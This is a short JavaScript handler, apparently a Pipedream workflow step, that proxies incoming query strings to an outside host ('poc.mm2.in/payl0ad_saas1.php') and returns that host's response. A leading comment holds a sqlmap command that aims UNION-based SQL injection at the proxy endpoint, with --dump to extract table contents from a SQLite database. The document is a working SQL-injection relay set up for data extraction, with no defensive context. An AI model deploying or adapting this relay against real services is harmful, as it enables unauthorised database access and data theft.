//-u https://eoquyu4859rqbl3.m.pipedream.net/?0=1 --dump -C [Request] -T z --dbms=SQLite --answer=Y --technique=U

import axios from "axios";

export default defineComponent({
  async run({ steps, $ }) {
    var querystring = '';
    const rurl = steps.trigger.event.url;
    if(rurl != undefined){
      querystring = rurl.split('?')[1];
    }
    try{
      const resp = await axios({
        method: "GET",
        url: `http://poc.mm2.in/payl0ad_saas1.php?`+querystring,
      });

      await $.respond({
        status: 200,
        headers: {},
        body: resp.data,
      })
    } catch (e) {
      await $.respond({
        status: 500,
        headers: {},
        body: 'Error',
      })
    }
  },
})

